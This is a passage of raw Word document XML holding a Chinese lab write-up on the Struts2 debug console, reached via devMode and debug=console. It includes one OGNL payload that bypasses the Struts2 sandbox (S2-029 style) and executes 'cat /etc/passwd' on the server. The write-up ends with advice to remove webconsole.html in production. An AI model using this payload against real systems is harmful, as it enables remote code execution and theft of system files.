          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>devMode=true</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>在任意一个</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>后面加载</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>debug=console</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>就会进入到下面的逻辑</w:t>
      </w:r>
      <w:r w:rsidR="00E532E4">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E532E4" w:rsidRPr="00E532E4">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E532E4" w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>此时前端可以拿到</w:t>
      </w:r>
      <w:r w:rsidR="00E532E4" w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pathname</w:t>
      </w:r>
      <w:r w:rsidR="00E532E4" w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>这个值，所以可以正常交互</w:t>
      </w:r>
      <w:r w:rsidR="00677CFA">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B104B6" w:rsidRPr="00A32357" w:rsidRDefault="009819D9" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00B104B6" w:rsidRPr="00566231">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="000000" w:themeColor="text1"/>
          </w:rPr>
          <w:t>http://192.168.1.108:8081/example/HelloWorld.action?debug=console</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FB5450" w:rsidRPr="00A32357" w:rsidRDefault="004F303B" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B6233">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica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 wp14:anchorId="732032DF" wp14:editId="354C82C8">
            <wp:extent cx="5580380" cy="3424555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="C:\Users\H4ck0rInj\Documents\Tencent Files\892850447\Image\C2C\AB%MR)J412E8~X$1Y7GSH[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4ck0rInj\Documents\Tencent Files\892850447\Image\C2C\AB%MR)J412E8~X$1Y7GSH[X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ACE" w:rsidRPr="00A32357" w:rsidRDefault="00FB5450" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过抓包可以看到console的实现也是走的command模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B5EBD" w:rsidRDefault="00FB5450" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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576D3CB" wp14:editId="454D2773">
            <wp:extent cx="5580380" cy="21050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E5" w:rsidRDefault="00FB5450" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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 w:rsidRPr="00FB5450">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica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580380" cy="2498285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="C:\Users\H4ck0rInj\Documents\Tencent Files\892850447\Image\C2C\S[IY}E)S919{Z0BXBCB2`K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4ck0rInj\Documents\Tencent Files\892850447\Image\C2C\S[IY}E)S919{Z0BXBCB2`K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49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4ACE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidR="005C4ACE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidR="005C4ACE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>的沙盒拦截</w:t>
      </w:r>
      <w:r w:rsidR="00395203">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005C4ACE" w:rsidRPr="003B5EBD">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="118F097E" wp14:editId="376BD24F">
            <wp:extent cx="5580380" cy="3495675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="C:\Users\H4ck0rInj\Documents\Tencent Files\892850447\Image\C2C\]2)X)I%)UPGEC310}F$O1[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4ck0rInj\Documents\Tencent Files\892850447\Image\C2C\]2)X)I%)UPGEC310}F$O1[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E0" w:rsidRDefault="007202E0" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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</w:p>
    <w:p w:rsidR="0020547F" w:rsidRDefault="0020547F" w:rsidP="0020547F">
      <w:pPr>
        <w:pStyle w:val="a8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webconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>执行代码</w:t>
      </w:r>
      <w:r w:rsidR="00F04E96">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B5EBD" w:rsidRDefault="003B5EBD" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>st2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>029</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>漏洞的</w:t>
      </w:r>
      <w:r w:rsidR="007F49A8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>bypass struts2</w:t>
      </w:r>
      <w:r w:rsidR="007F49A8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>的安全管理器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A74D8" w:rsidRDefault="009A74D8" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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 w:rsidRPr="009A74D8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>#_memberAccess.allowPrivateAccess=true,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=@java.lang.Runtime@getR</w:t>
      </w:r>
      <w:r w:rsidRPr="009A74D8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>untime(),#s=new java.util.Scanner(#a.exec('cat /etc/passwd').getInputStream()).useDelimiter('\\\\A'),#str=#s.hasNext()?#s.next():'',#res.print(#str),#res.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A74D8" w:rsidRDefault="009A74D8" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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</w:p>
    <w:p w:rsidR="0011403F" w:rsidRDefault="009A74D8" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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CA6C8FD" wp14:editId="10D55B1C">
            <wp:extent cx="5580380" cy="1947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F4" w:rsidRPr="00B2582E" w:rsidRDefault="00550C3A" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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</w:t>
      </w:r>
      <w:r w:rsidR="00423CF4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>t2.5.5</w:t>
      </w:r>
      <w:r w:rsidR="00423CF4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>沙盒不能覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B2582E" w:rsidRPr="0011403F" w:rsidRDefault="009523BD" w:rsidP="00B2582E">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetic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1BBFAB4" wp14:editId="2363A525">
            <wp:extent cx="5580380" cy="3677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2E" w:rsidRDefault="00B2582E" w:rsidP="00B2582E">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>devMode=false</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>从新部署项目，</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>这个页面也是可以直接访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B2582E" w:rsidRPr="00B2582E" w:rsidRDefault="00B2582E" w:rsidP="006C1218">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B2582E" w:rsidRDefault="00B2582E" w:rsidP="006C1218">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6CFC" w:rsidRPr="006C1218" w:rsidRDefault="005A6CFC" w:rsidP="006C1218">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>结论</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C579B4" w:rsidRDefault="00447884" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞能否利用取决于dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
        <w:t>Mode是否开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，webconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r w:rsidR="003F56DA">
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
        <w:t>知识</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
        <w:t>一个html页面而已</w:t>
      </w:r>
      <w:r w:rsidR="00F857CF">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F857CF" w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生产项目中是还是建议删除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011403F" w:rsidRPr="006C1218" w:rsidRDefault="0011403F" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
        <w:t>webconsole调试ognl的好工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395203" w:rsidRDefault="00395203" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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</w:p>
    <w:p w:rsidR="00E07AD7" w:rsidRDefault="00E07AD7" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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</w:p>
    <w:p w:rsidR="00395203" w:rsidRPr="00E07AD7" w:rsidRDefault="00E07AD7" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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 w:rsidRPr="00A815AC">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>https://my.oschina.net/u/1188877/blog/196240</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395203" w:rsidRDefault="00395203" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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http://struts.apache.org/docs/debugginginterceptor.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395203" w:rsidRDefault="009819D9" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8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hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00314CD0" w:rsidRPr="00566008">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="000000"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
          </w:rPr>
          <w:t>http://issues.appfuse.org/browse/APF-1438</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A66AA7" w:rsidRPr="00BD5F6F" w:rsidRDefault="009636F4" w:rsidP="00BD5F6F">
      <w:pPr>
        <w:pStyle w:val="a8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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="00BD5F6F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>https://www.iswin.org/2016/03/20/Struts2-S2-029%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00A66AA7" w:rsidRPr="00BD5F6F" w:rsidSect="00B07B2B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9D9" w:rsidRDefault="009819D9" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009819D9" w:rsidRDefault="009819D9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BD5F6F">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>6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BD5F6F">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>6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9D9" w:rsidRDefault="009819D9" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009819D9" w:rsidRDefault="009819D9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9819D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9819D9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9819D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A0B97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83DA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1D8E"/>
    <w:rsid w:val="00025A5C"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="0002776E"/>
    <w:rsid w:val="000425C5"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="00095410"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000D26B6"/>
    <w:rsid w:val="000D67C1"/>
    <w:rsid w:val="000D72C4"/>
    <w:rsid w:val="00107689"/>
    <w:rsid w:val="00110904"/>
    <w:rsid w:val="0011403F"/>
    <w:rsid w:val="001256E1"/>
    <w:rsid w:val="0013244E"/>
    <w:rsid w:val="00132A14"/>
    <w:rsid w:val="001409B0"/>
    <w:rsid w:val="001464F8"/>
    <w:rsid w:val="001763BE"/>
    <w:rsid w:val="00180F81"/>
    <w:rsid w:val="001A657E"/>
    <w:rsid w:val="001C6165"/>
    <w:rsid w:val="001C7FC2"/>
    <w:rsid w:val="0020547F"/>
    <w:rsid w:val="00214A94"/>
    <w:rsid w:val="002176D3"/>
    <w:rsid w:val="00225B8A"/>
    <w:rsid w:val="00283893"/>
    <w:rsid w:val="002A2E7C"/>
    <w:rsid w:val="002B7062"/>
    <w:rsid w:val="002C5BA6"/>
    <w:rsid w:val="002D068E"/>
    <w:rsid w:val="00314CD0"/>
    <w:rsid w:val="00325BC1"/>
    <w:rsid w:val="0034540F"/>
    <w:rsid w:val="003475CF"/>
    <w:rsid w:val="0038317E"/>
    <w:rsid w:val="00395203"/>
    <w:rsid w:val="003A27D3"/>
    <w:rsid w:val="003B5EBD"/>
    <w:rsid w:val="003D32A9"/>
    <w:rsid w:val="003D5531"/>
    <w:rsid w:val="003E226D"/>
    <w:rsid w:val="003E4B58"/>
    <w:rsid w:val="003F56DA"/>
    <w:rsid w:val="00400747"/>
    <w:rsid w:val="00405B1A"/>
    <w:rsid w:val="00423CF4"/>
    <w:rsid w:val="00425416"/>
    <w:rsid w:val="00447884"/>
    <w:rsid w:val="00460887"/>
    <w:rsid w:val="004723D2"/>
    <w:rsid w:val="00473165"/>
    <w:rsid w:val="0048668C"/>
    <w:rsid w:val="004902B7"/>
    <w:rsid w:val="00496D77"/>
    <w:rsid w:val="004A33E4"/>
    <w:rsid w:val="004B1F22"/>
    <w:rsid w:val="004C470B"/>
    <w:rsid w:val="004D2956"/>
    <w:rsid w:val="004D52C1"/>
    <w:rsid w:val="004F303B"/>
    <w:rsid w:val="004F36AF"/>
    <w:rsid w:val="00502B5B"/>
    <w:rsid w:val="00502E9E"/>
    <w:rsid w:val="00532BCD"/>
    <w:rsid w:val="00544DF6"/>
    <w:rsid w:val="00550C3A"/>
    <w:rsid w:val="00552F73"/>
    <w:rsid w:val="00553603"/>
    <w:rsid w:val="005630F4"/>
    <w:rsid w:val="00566008"/>
    <w:rsid w:val="00566231"/>
    <w:rsid w:val="0056770E"/>
    <w:rsid w:val="00570DCC"/>
    <w:rsid w:val="00577A0F"/>
    <w:rsid w:val="00590E32"/>
    <w:rsid w:val="00591B65"/>
    <w:rsid w:val="005A6CFC"/>
    <w:rsid w:val="005B440E"/>
    <w:rsid w:val="005C4ACE"/>
    <w:rsid w:val="005D008F"/>
    <w:rsid w:val="00600EBB"/>
    <w:rsid w:val="00602164"/>
    <w:rsid w:val="00624C0C"/>
    <w:rsid w:val="0062612E"/>
    <w:rsid w:val="00651892"/>
    <w:rsid w:val="006534F4"/>
    <w:rsid w:val="00661D8E"/>
    <w:rsid w:val="00665F57"/>
    <w:rsid w:val="00672EFB"/>
    <w:rsid w:val="00677CFA"/>
    <w:rsid w:val="00682934"/>
    <w:rsid w:val="006B05C6"/>
    <w:rsid w:val="006B6233"/>
    <w:rsid w:val="006C1218"/>
    <w:rsid w:val="006C162F"/>
    <w:rsid w:val="006C237E"/>
    <w:rsid w:val="006F513E"/>
    <w:rsid w:val="006F71F9"/>
    <w:rsid w:val="007202E0"/>
    <w:rsid w:val="00725C1A"/>
    <w:rsid w:val="00751A9D"/>
    <w:rsid w:val="00752689"/>
    <w:rsid w:val="00760B2B"/>
    <w:rsid w:val="00765658"/>
    <w:rsid w:val="0077437D"/>
    <w:rsid w:val="00785116"/>
    <w:rsid w:val="00790BA7"/>
    <w:rsid w:val="00796DA7"/>
    <w:rsid w:val="007971E2"/>
    <w:rsid w:val="007A5208"/>
    <w:rsid w:val="007A5775"/>
    <w:rsid w:val="007A5FAB"/>
    <w:rsid w:val="007B110A"/>
    <w:rsid w:val="007B3011"/>
    <w:rsid w:val="007C0862"/>
    <w:rsid w:val="007D15BA"/>
    <w:rsid w:val="007D6500"/>
    <w:rsid w:val="007D668C"/>
    <w:rsid w:val="007D6EBD"/>
    <w:rsid w:val="007F49A8"/>
    <w:rsid w:val="007F7E47"/>
    <w:rsid w:val="00825829"/>
    <w:rsid w:val="00827EE3"/>
    <w:rsid w:val="00851504"/>
    <w:rsid w:val="0088338F"/>
    <w:rsid w:val="008A1490"/>
    <w:rsid w:val="008A23EA"/>
    <w:rsid w:val="008E3FCA"/>
